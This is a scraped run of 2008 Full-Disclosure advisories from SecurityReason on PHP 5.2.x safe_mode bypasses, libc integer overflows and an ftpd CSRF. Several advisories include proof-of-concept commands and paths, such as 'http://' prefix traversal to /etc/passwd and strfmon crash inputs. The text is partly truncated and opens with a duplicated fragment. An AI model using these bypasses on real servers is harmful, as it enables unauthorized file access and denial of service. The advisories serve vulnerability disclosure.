?? S 4:01AM 0:00.00 /usr/local/sbin/httpd www 6365 0.0 0.5 18676 14288 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd 127#So what is wrong? Let's try to understand this problem. Let's start with a difference www 6361 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd and www 6361 0.0 0.5 18676 14288 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd RSS: 14288-14248 = 40 memory leak? No. In first request, we have declared error_log, via .htaccess. - --- main/main.c --- ... STD_PHP_INI_ENTRY("error_log", NULL, PHP_INI_ALL, OnUpdateErrorLog,
[Full-disclosure] SecurityReason.com : PHP 5.2.6 SAPI php_getuid() overload
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ SecurityReason.com : PHP 5.2.6 SAPI php_getuid() overload ] Author: Maksymilian Arciemowicz securityreason.com Date: - - Written: 20.11.2008 - - Public: 05.12.2008 SecurityReason Research SecurityAlert Id: 59 SecurityRisk: High Affected Software: PHP 5.2.6 Advisory URL: http://securityreason.com/achievement_securityalert/59 Vendor: http://www.php.net - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. http://pl.php.net/manual/pl/refs.utilspec.server.php - --- 1.PHP 5.2.6 SAPI php_getuid() overload --- Using PHP 5.2.6, as a Apache module can bypass many security points. To understand this issue, first we need know, where is the problem. 127# cd /www/trafka 127# ls -la total 12 drwxr-xr-x 2 www www 512 Sep 10 03:49 . drwxr-xr-x 4 www www 512 Sep 10 03:41 .. - -rw-r--r-- 1 www www 26 Sep 10 03:49 .htaccess - -rw-r--r-- 1 www www 33 Sep 10 03:49 not.php - -rw-r--r-- 1 www www 107 Sep 10 03:49 pufff.php - -rw-r--r-- 1 www www 27 Sep 10 03:49 sleep.php 127# cat .htaccess php_value error_log /etc/ 127# cat not.php 127# cat pufff.php 127# cat sleep.php 127# apachectl restart /usr/local/sbin/apachectl restart: httpd restarted 127# curl http://localhost/trafka/pufff.php safe_mode=1 error_log=/etc/ 127# curl http://localhost/trafka/not.php only echo 127# curl http://localhost/trafka/not.php only echo 127# curl http://localhost/trafka/not.php only echo 127# curl http://localhost/trafka/not.php only echo 127# curl http://localhost/trafka/not.php only echo 127# curl http://localhost/trafka/pufff.php safe_mode=1 error_log= 127# Now error_log is empty Example exploit: 127# curl http://localhost/trafka/pufff.php safe_mode=1 error_log= 127# curl http://localhost/trafka/sleep.php ^C 127# curl http://localhost/trafka/sleep.php ^C 127# curl http://localhost/trafka/sleep.php ^C 127# curl http://localhost/trafka/sleep.php ^C 127# curl http://localhost/trafka/sleep.php ^C 127# curl http://localhost/trafka/pufff.php safe_mode=1 error_log=/etc/ any new "apache child" process, allow overload environment like error_log. 127# apachectl restart /usr/local/sbin/apachectl restart: httpd restarted 127# ps -aux -U www USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND www 6361 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd www 6362 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd www 6363 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd www 6364 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd www 6365 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd 127# curl http://localhost/trafka/pufff.php safe_mode=1 error_log=/etc/ 127# ps -aux -U www USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND www 6361 0.0 0.5 18676 14288 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd www 6362 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd www 6363 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd www 6364 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd www 6365 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd 127# curl http://localhost/trafka/pufff.php safe_mode=1 error_log=/etc/ 127# curl http://localhost/trafka/pufff.php safe_mode=1 error_log=/etc/ 127# curl http://localhost/trafka/pufff.php safe_mode=1 error_log=/etc/ 127# curl http://localhost/trafka/pufff.php safe_mode=1 error_log=/etc/ 127# curl http://localhost/trafka/pufff.php safe_mode=1 error_log= 127# curl http://localhost/trafka/pufff.php safe_mode=1 error_log= 127# ps -aux -U www USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND www 6361 0.0 0.5 18676 14288 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd www 6362 0.0 0.5 18676 14288 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd www 6363 0.0 0.5 18676 14288 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd www 6364 0.0 0.5 18676 14288 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd www 6365 0.0 0.5 18676 14288 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd 127#So what is wrong? Let's try to understand this problem. Let's start with a difference www 6361 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd and www 6361 0.0 0.5 18676 14288 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd RSS: 14288-14248 = 40 memory leak? No. In first request, we have declared error_log, via .htaccess. - --- main/main.c --- ... STD_PHP_INI_ENTRY("error_log", NULL, PHP_INI_ALL, OnUpdateErrorLog,
[Full-disclosure] SecurityReason : PHP 5.2.6 dba_replace() destroying file
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ SecurityReason.com PHP 5.2.6 dba_replace() destroying file ] Author: Maksymilian Arciemowicz http://securityreason.com Date: - - Written: 10.11.2008 - - Public: 28.11.2008 SecurityReason Research SecurityAlert Id: 58 SecurityRisk: Medium Affected Software: PHP 5.2.6 Advisory URL: http://securityreason.com/achievement_securityalert/58 Vendor: http://www.php.net - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. NOTE: These functions build the foundation for accessing Berkeley DB style databases. dba_replace - Replace or insert entry - --- 1. dba_replace() destroying file --- Function dba_replace() are not filtring strings key and value. There is a possibility the destruction of the file. # cat /www/dba.hack.php # cat /www/about.ini PATH=/ CURR=. HOME=/home/ # php /www/dba.hack.php # cat /www/about.ini PATH=/ CURR=. HOME=/www/ # Well. But, lets try use # cat /www/dba.ham.php # php /www/dba.ham.php # cat /www/about.ini # Now /www/about.ini, is emtpy. - --- 2. How to fix --- Fixed in CVS http://cvs.php.net/viewvc.cgi/php-src/NEWS?r1=1.2027.2.547.2.1313&r2=1.2027.2.547.2.1314&; - --- 3. Greets --- sp3x p_e_a Infospec schain - --- 4. Contact --- Author: SecurityReason [ Maksymilian Arciemowicz ] Email: cxib [ a t] securityreason [d ot ] com GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg http://securityreason.com http://securityreason.pl -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (OpenBSD) iEYEARECAAYFAkkvKDcACgkQpiCeOKaYa9aRUgCgmsbU4uKeq1E+/yyIlQas9V14 e2MAoJobXQNRD8BNiDsHQYSNdOxIyQRc =Tb8r -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SecurityReason : PHP 5.2.6 (error_log) safe_mode bypass
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ SecurityReason.com PHP 5.2.6 (error_log) safe_mode bypass ] Author: Maksymilian Arciemowicz (cXIb8O3) securityreason.com Date: - - Written: 10.11.2008 - - Public: 20.11.2008 SecurityReason Research SecurityAlert Id: 57 CWE: CWE-264 SecurityRisk: Medium Affected Software: PHP 5.2.6 Advisory URL: http://securityreason.com/achievement_securityalert/57 Vendor: http://www.php.net - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. error_log They allow you to define your own error handling rules, as well as modify the way the errors can be logged. This allows you to change and enhance error reporting to suit your needs. - --- 0. error_log const. bypassed by php_admin_flag --- The main problem is between using safe_mode in global mode php.ini: safe_mode = On and declaring via php_admin_flag ... php_admin_flag safe_mode On When we create some php script in /www/ and try call to: ini_set("error_log", "/hack/"); or in /www/.htaccess php_value error_log "/hack/bleh.php" Result: Warning: Unknown: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in Unknown on line 0 Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4 It was for safe_mode declared in php.ini. But if we use php_admin_flag safe_mode On in httpd.conf, we will get only Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4 syntax in .htaccess php_value error_log "/hack/blehx.php" is allowed and bypass safe_mode. example exploit: error_log("", 0); - --- 2. How to fix --- Fixed in CVS http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1315&view=markup Note: Do not use safe_mode as a main safety. --- 3. Greets --- sp3x Infospec schain p_e_a pi3 - --- 4. Contact --- Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ] Email: cxib [at] securityreason [dot] com GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg http://securityreason.com http://securityreason.pl -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.9 (FreeBSD) iEYEARECAAYFAkklRdcACgkQpiCeOKaYa9bh0gCeN8rn2nWY0YUJ7QHmnxfD5TAe 8hgAmwV0vc0Mk7rIUY5KJezctW589ydy =zM1X -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] multiple vendor ftpd - Cross-site request forgery
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ multiple vendor ftpd - Cross-site request forgery ] Author: Maksymilian Arciemowicz securityreason.com Date: - - Written: 03.09.2008 - - Public: 26.09.2008 SecurityReason Research SecurityAlert Id: 56 CVE: not assigned SecurityRisk: Low Affected Software: This problem has been discovered on OpenBSD 4.3 . - - Affected systems: + OpenBSD + NetBSD + FreeBSD + some linux - - Affected applications: + proFTPd + others Advisory URL: http://securityreason.com/achievement_securityalert/56 - --- 0.Description --- ftpd -- Internet File Transfer Protocol server The ftpd utility is the Internet File Transfer Protocol server process. The server uses the TCP protocol and listens at the port specified with the -P option or in the ``ftp'' service specification; see services(5). Cross-site request forgery, also known as one click attack, sidejacking or session riding and abbreviated as CSRF (Sea-Surf[1]) or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user the website trusts. Contrary to cross-site scripting (XSS), which exploits the trust a user has for a particular site, cross-site request forgery exploits the trust that a site has for a particular user. http://en.wikipedia.org/wiki/Cross-site_request_forgery - --- 1. ftpd bsd - Cross-site request forgery --- The main problem exists in dividing long command for few others. The problem stems from the fact the use of the loop for(;;) and function fgets(). Example: Command "AA AAA AAA AAA AAA AAA AAA AAA AAA AAA AAA AAA AAA" will be split for 500 'AA AAA AAA AAA AAA AAA AA': command not understood. 500 'AA AAA AAA AAA AAA AAA AA' When we try request to ftp deamon via browsers and path is longer 512<, our URL will be split. /* FreeBSD 7.0 */ ftp://[EMAIL PROTECTED]///SYST return result from SYST command: 215 UNIX Type: L8 Version: BSD-199506 /* NetBSD 4.0 */ ftp://ftp.netbsd.org///SYST return result from SYST command: 215 UNIX Type: L8 V
[Full-disclosure] libc/net inet_net_pton() integer overflow
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [WLB-2008080064: inet_net_pton() integer overflow ] Author: Maksymilian Arciemowicz (cxib) SecurityReason.com Date: - - Written: 02.08.2008 - - Public: 22.08.2008 SecurityRisk: Low It is a bug, without a high security risk. We are going informing all vendors, about this problem. Affected Software: libc inet_net_pton.c ver ISC Bind - - OpenBSD fixed Original URL WLB-2008080064 : http://securityreason.com/wlb_show/WLB-2008080064 Vendor: http://www.isc.org/index.pl?/sw/bind/index.php - --- 0.Description --- inet_net_pton - Internet network number manipulation routines SYNOPSIS: int inet_net_pton(int af, const char *src, void *dst, size_t size); The inet_net_pton() function converts a presentation format Internet network number (that is, printable form as held in a character string) to network format (usually a struct in_addr or some other internal binary representation, in network byte order). It returns the number of bits (either computed based on the class, or specified with /CIDR), or -1 if a failure occurred (in which case errno will have been set. It will be set to ENOENT if the Internet network number was not valid). Caution: The dst field should be zeroed before calling inet_net_pton() as the function will only fill the number of bytes necessary to encode the network number in network byte order. The only value for af currently supported is AF_INET. size is the size of the result buffer dst. NETWORK NUMBERS (IP VERSION 4) The external representation of Internet network numbers may be specified in one of the following forms: a a.b a.b.c a.b.c.d Any of the above four forms may have ``/bits'' appended where ``bits'' is in the range 0-32 and is used to explicitly specify the number of bits in the network address. When ``/bits'' is not specified the number of bits - --- 1. libc/net inet_net_pton() integer overflow --- The main problem exist in inet_net_pton() function. Let's see to this function inet_net_pton.c - --- int inet_net_pton(int af, const char *src, void *dst, size_t size) { switch (af) { case AF_INET: return (inet_net_pton_ipv4(src, dst, size)); default: errno = EAFNOSUPPORT; return (-1); } } - --- call to inet_net_pton_ipv4(). So let's see it.. - -START-- static int inet_net_pton_ipv4(const char *src, u_char *dst, size_t size) { static const char xdigits[] = "0123456789abcdef", digits[] = "0123456789"; int n, ch, tmp, dirty, bits; const u_char *odst = dst; ch = *src++; if (ch == '0' && (src[0] == 'x' || src[0] == 'X') && isascii(src[1]) && isxdigit(src[1])) { /* Hexadecimal: Eat nybble string. */ if (size <= 0) goto emsgsize; *dst = 0, dirty = 0; src++; /* skip x or X. */ while ((ch = *src++) != '\0' && isascii(ch) && isxdigit(ch)) { if (isupper(ch)) ch = tolower(ch); n = strchr(xdigits, ch) - xdigits; assert(n >= 0 && n <= 15); *dst |= n; if (!dirty++) *dst <<= 4; else if (size-- > 0) *++dst = 0, dirty = 0; else goto emsgsize; } if (dirty) size--; } else if (isascii(ch) && isdigit(ch)) { /* Decimal: eat dotted digit string. */ for (;;) { tmp = 0; do { n = strchr(digits, ch) - digits; assert(n >= 0 && n <= 9); tmp *= 10; tmp += n; if (tmp > 255) goto enoent; } while ((ch = *src++) != '\0' && isascii(ch) && isdigit(ch)); if (size-- <= 0) goto emsgsize; *dst++ = (u_char) tmp; if (ch == '\0' || ch == '/') break; if (ch != '.') goto enoent; ch = *src++; if (!isascii(ch) || !isdigit(ch)) goto enoent; }
[Full-disclosure] PHP 5.2.6 chdir(), ftok() (standard ext) safe_mode bypass
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [PHP 5.2.6 chdir(),ftok() (standard ext) safe_mode bypass ] Author: Maksymilian Arciemowicz (cXIb8O3) securityreason.com Date: - - Written: 10.05.2008 - - Public: 17.06.2008 SecurityReason Research SecurityAlert Id: 55 CVE: CVE-2008-2666 CWE: CWE-264 SecurityRisk: Medium Affected Software: PHP 5.2.6 Advisory URL: http://securityreason.com/achievement_securityalert/55 Vendor: http://www.php.net - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. chdir ? Change directory SYNOPSIS: bool chdir ( string $directory ) http://pl.php.net/manual/en/function.chdir.php ftok ? Convert a pathname and a project identifier to a System V IPC key SYNOPSIS: int ftok ( string $pathname , string $proj ) http://pl.php.net/manual/en/function.ftok.php !!! WARNING !!! IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL NOT LIST ALL VULNERABLE FUNCTIONS - --- 1. chdir(), ftok() (from standard ext) and more safe_mode bypass --- Let's see to chdir() function - --- PHP_FUNCTION(chdir) { char *str; int ret, str_len; if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &str, &str_len) == FAILURE) { RETURN_FALSE; } if ((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC)) { RETURN_FALSE; } ret = VCWD_CHDIR(str); if (ret != 0) { php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s (errno %d)", strerror(errno), errno); RETURN_FALSE; } RETURN_TRUE; } - --- str is beeing checked by safe_mode example: - --- Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access / owned by uid 0 in /www/mb/mb.php on line 8 - --- in current directory, we should create subdir "http:". => it is possible to create chdir("http://../../../../../../";) and we are in / Why? TRUE==((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC))) for str="http://../../../../../../"; safe_mode will ignore all paths with http:// that same situation with ftok() function (and more) - ---EXAMPLE1--- cxib# cat /www/wufff.php cxib# ls -la /www/wufff.php - -rw-r--r-- 1 www www 62 Jun 17 17:14 /www/wufff.php cxib# php /www/wufff.php /www Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /etc/ owned by uid 0 in /www/wufff.php on line 3 /www cxib# - ---/EXAMPLE1--- - ---EXAMPLE2--- cxib# ls -la /www/wufff.php - -rw-r--r-- 1 www www 74 Jun 17 17:13 /www/wufff.php cxib# ls -la /www/http: total 8 drwxr-xr-x 2 www www 512 Jun 17 17:12 . drwxr-xr-x 19 www www 4608 Jun 17 17:13 .. cxib# cat /www/wufff.php http://../../etc/";); echo getcwd()."\n"; ?> cxib# php /www/wufff.php /www /etc cxib# - ---/EXAMPLE2--- !!! WARNING !!! IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL NOT LISTS ALL VULNERABLE FUNCTIONS - --- 2. How to fix --- Do not use safe_mode as a main safety - --- 3. Greets --- sp3x Infospec schain p_e_a Chujwamwdupe - --- 4. Contact --- Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ] Email: cxib [at] securityreason [dot] com GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg http://securityreason.com http://securityreason.pl -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.4 (FreeBSD) iD8DBQFIWCCbW1OhNJH6DMURAsNnAJsEVuvHigC9EZfcg0hhFtlXJsaCMQCgl0w9 W6fcb5TR6GxN9osji+wQCqM= =tyyL -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PHP 5.2.6 posix_access() (posix ext) safe_mode bypass
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [PHP 5.2.6 posix_access() (posix ext) safe_mode bypass ] Author: Maksymilian Arciemowicz (cXIb8O3) SecurityReason.com Date: - - Written: 10.05.2008 - - Public: 17.06.2008 SecurityReason Research SecurityAlert Id: 54 CVE: CVE-2008-2665 CWE: CWE-264 SecurityRisk: Low Affected Software: PHP 5.2.6 Advisory URL: http://securityreason.com/achievement_securityalert/54 Vendor: http://www.php.net - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. posix_access ? Determine accessibility of a file SYNOPSIS: bool posix_access ( string $file [, int $mode ] ) http://pl2.php.net/manual/pl/function.posix-access.php !!! WARNING !!! IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL NOT LIST ALL VULNERABLE FUNCTIONS - --- 1. PHP 5.2.6 posix_access() safe_mode bypass --- Let's see to posix_access() function - --- PHP_FUNCTION(posix_access) { long mode = 0; int filename_len, ret; char *filename, *path; if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|l", &filename, &filename_len, &mode) == FAILURE) { RETURN_FALSE; } path = expand_filepath(filename, NULL TSRMLS_CC); if (!path) { POSIX_G(last_error) = EIO; RETURN_FALSE; } if (php_check_open_basedir_ex(path, 0 TSRMLS_CC) || (PG(safe_mode) && (!php_checkuid_ex(filename, NULL, CHECKUID_CHECK_FILE_AND_DIR, CHECKUID_NO_ERRORS { efree(path); POSIX_G(last_error) = EPERM; RETURN_FALSE; } ret = access(path, mode); efree(path); if (ret) { POSIX_G(last_error) = errno; RETURN_FALSE; } RETURN_TRUE; } - --- var_dump(posix_access("http://../../../etc/passwd";))==True var_dump(posix_access("/etc/passwd"))==False Why? Because path = expand_filepath(filename, NULL TSRMLS_CC); will change "http://../../../etc/passwd"; to path=/etc/passwd (PG(safe_mode) && (!php_checkuid_ex(filename, NULL, CHECKUID_CHECK_FILE_AND_DIR, CHECKUID_NO_ERRORS))) will check realy path "http://../../../etc/passwd";. http:// is using in php_checkuid_ex(), so safe_mode is bypassed. !!! WARNING !!! IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL NOT LIST ALL VULNERABLE FUNCTIONS - --- 2. How to Fix --- Do not use safe_mode as a main safety - --- 3. Greets --- sp3x Infospec schain p_e_a Chujwamwdupe - --- 4. Contact --- Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ] Email: cxib [at] securityreason [dot] com GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg http://securityreason.com http://securityreason.pl -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.4 (FreeBSD) iD8DBQFIWCC+W1OhNJH6DMURAsq4AJ0eC1qKOZVOJJB3XDRIhpufNe1qUwCfTWv0 n4Sg31DePRpr4h3PLouKFoA= =6qwD -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [securityreason] *BSD libc (strfmon) Multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ *BSD libc (strfmon) Multiple vulnerabilities ] Author: Maksymilian Arciemowicz (cxib) SecurityReason.com Date: - - Written: 10.03.2008 - - Public: 25.03.2008 SecurityReason Research SecurityAlert Id: 53 CVE: CVE-2008-1391 SecurityRisk: High Affected Software: FreeBSD lines: 6,7 NetBSD 4 another systems what use this functions. Standard C Library (libc, -lc) for BSD probably some MacOS version Advisory URL: http://securityreason.com/achievement_securityalert/53 Vendor: http://www.php.net - --- 0.Description --- strfmon -- convert monetary value to string The strfmon() function places characters into the array pointed to by s as controlled by the string pointed to by format. No more than maxsize bytes are placed into the array. The format string is composed of zero or more directives: ordinary characters (not %), which are copied unchanged to the output stream; and conversion specifications, each of which results in fetching zero or more subsequent arguments. Each conversion specification is introduced by the % character. SYNOPSIS: #include ssize_t strfmon(char * restrict s, size_t maxsize, const char * restrict format, ...); - --- 1. /usr/src/lib/libc/stdlib/strfmon.c - Integer Overflow --- The main problem and vulnerability exist in strfmon() function. When we use this function in example program: - ---example-start-- #include #include int main(int argc, char* argv[]){ char buff[51]; char *bux=buff; int res; res=strfmon(bux, 50, argv[1], "0"); return 0; } - ---example-end-- and compile it, we can manipulate format string. Let's try to run example: cxib# ./pln %n Segmentation fault (core dumped) What is wrong? Let's see cxib# gdb -q pln (no debugging symbols found)...(gdb) r %n Starting program: /cxib/C/pln %n (no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x2814e0e6 in memmove () from /lib/libc.so.7 (gdb) memmove() will bad reallocation memory. cxib# gdb -q pln (no debugging symbols found)...(gdb) r %.99n Starting program: /cxib/C/pln %.99n (no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x2814f093 in abort () from /lib/libc.so.7 Next example is : cxib# ./pln %#n Long execution time. Let's try check this process : - -- cxib# ps -aux | grep pln cxib 1843 89.1 13.2 140320 119588 p2 R+4:29PM 0:09.68 ./pln %#n cxib# ps -aux | grep pln cxib 1843 94.7 48.4 482336 438236 p2 R+4:29PM 1:54.07 ./pln %#n 1 VSZ=140320 2 VSZ=482336 - Why? pln will allocate more memory that we have. PHP use strfmon() in money_format() function. When we use mod_php5 in apache, we can create example exploit.. result will be : - ---apache-child-die--- swap_pager: out of swap space swap_pager_getswapspace(16): failed Mar 15 21:03:23 cxib kernel: pid 1210 (httpd), uid 80, was killed: out of swap space - ---apache-child-die--- Difference between %n and (%#n or %.99n) is "#" or "." o A `#' sign followed by a decimal number specifying the maximum expected number of digits after the radix character. o A `.' character followed by a decimal number specifying the number the number of digits after the radix character. Let's see the source of strfmon() function : - ---strfmon()-start--- ssize_t strfmon(char * __restrict s, size_t maxsize, const char * __restrict format, ...) { va_list ap; char*dst; /* output destination pointer */ const char *fmt; /* current format poistion pointer */ struct lconv*lc;/* pointer to lconv structure */ char*asciivalue;/* formatted double pointer */ int flags; /* formatting options */ int pad_char; /* padding character */ int pad_size; /* pad size */ int width; /* field width */ int left_prec; /* left precision */ int right_prec; /* right precision */ double value; /* just value */ charspace_char = ' '; /* space after currency */ charcs_precedes,/* values gathered from struct lconv */ sep_by_space, sign_posn, *signstr, *currency_symbol; char*tmpptr;/* temporary vars */ int
[Full-disclosure] {securityreason.com}PHP 5 *printf() - Integer Overflow
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [PHP 5.2.5 and prior : *printf() functions Integer Overflow ] Author: Maksymilian Arciemowicz (cXIb8O3) SecurityReason.com and SecurityReason.pl Date: - - Written: 01.03.2008 - - Public: 20.03.2008 SecurityReason Research SecurityAlert Id: 52 CVE-2008-1384 SecurityRisk: Low Affected Software: PHP 5.2.5 and prior Advisory URL: http://securityreason.com/achievement_securityalert/52 Vendor: http://www.php.net - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. These functions all manipulate strings in various ways. Some more specialized sections can be found in the regular expression and URL handling sections. For information on how strings behave, especially with regard to usage of single quotes, double quotes, and escape sequences, see the Strings entry in the Types section of the manual. - --- 1. *printf() functions Integer Overflow --- The main problem exists in formatted_print.c file. cxib# uname -a FreeBSD cxib.laptop 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008 [EMAIL PROTECTED]:/usr/obj/usr/src/sys/GENERIC i386 cxib# php -v PHP 5.2.5 (cli) (built: Mar 13 2008 21:34:01) (DEBUG) Copyright (c) 1997-2007 The PHP Group Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies cxib# cat /www/printf.php cxib# php /www/printf.php Segmentation fault (core dumped) Good. Let's see to formatted_print.c file in php_sprintf_appendstring() function - ---formatted_print.c-start--- inline static void php_sprintf_appendstring(char **buffer, int *pos, int *size, char *add, int min_width, int max_width, char padding, int alignment, int len, int neg, int expprec, int always_sign) - ---formatted_print.c-end--- The main varible what we will see is "npad" - ---formatted_print.c-start--- copy_len = (expprec ? MIN(max_width, len) : len); npad = min_width - copy_len; - ---formatted_print.c-end--- good. npad is 2147483646 - ---formatted_print.c-start--- req_size = *pos + MAX(min_width, copy_len) + 1; - ---formatted_print.c-end--- req_size overflow - ---formatted_print.c-start--- if (req_size > *size) { while (req_size > *size) { *size <<= 1; } PRINTF_DEBUG(("sprintf ereallocing buffer to %d bytes\n", *size)); *buffer = erealloc(*buffer, *size); } - ---formatted_print.c-end--- (req_size > *size) is False (alignment == ALIGN_RIGHT) is True so - ---formatted_print.c-start--- while (npad-- > 0) { (*buffer)[(*pos)++] = padding; } - ---formatted_print.c-end--- and finish. Let's debug it with gdb - --- Debug --- 0x08295ba5 in php_sprintf_appendstring (buffer=0xbfbfd318, pos=0xbfbfd31c, size=0xbfbfd324, add=0x28f20404 'A' ..., min_width=2147483646, max_width=0, padding=65 'A', alignment=1, len=1, neg=0, expprec=0, always_sign=0) .. 0x290fff0c: 'A' ... 0x290fffd4: 'A' 0x2910: - --- Debug --- Script will alocated a lot of data to memory. Tested on: PHP 5.2.5 cxib# uname -a FreeBSD cxib.laptop 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008 [EMAIL PROTECTED]:/usr/obj/usr/src/sys/GENERIC i386 and PHP 5.1.6 [EMAIL PROTECTED] ~ $ uname -a NetBSD ultra 3.0.1 NetBSD 3.0.1 (GENERIC) #0: Fri Jul 14 03:47:28 UTC 2006 [EMAIL PROTECTED]:/home/builds/ab/netbsd-3-0-1-RELEASE/sparc64/200607131826 Z-obj/home/builds/ab/netbsd-3-0-1-RELEASE/src/sys/arch/sparc64/compile/GENE RIC sparc64 - --- 2. Exploit --- SecurityReason will not public official exploit for this issue. - --- 3. How to fix --- CVS http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1120&view=markup - --- 4. Greets --- sp3x Infospec p_e_a Chujwamwdupe schain and Stanislav Malyshev (Patch) - --- 5. Contact --- Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ] Email: cxib [at] securityreason [dot] com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg [NEW KEY] GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg.old [OLD KEY] http://securityreason.com http://securityreason.pl -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.4 (FreeBSD) 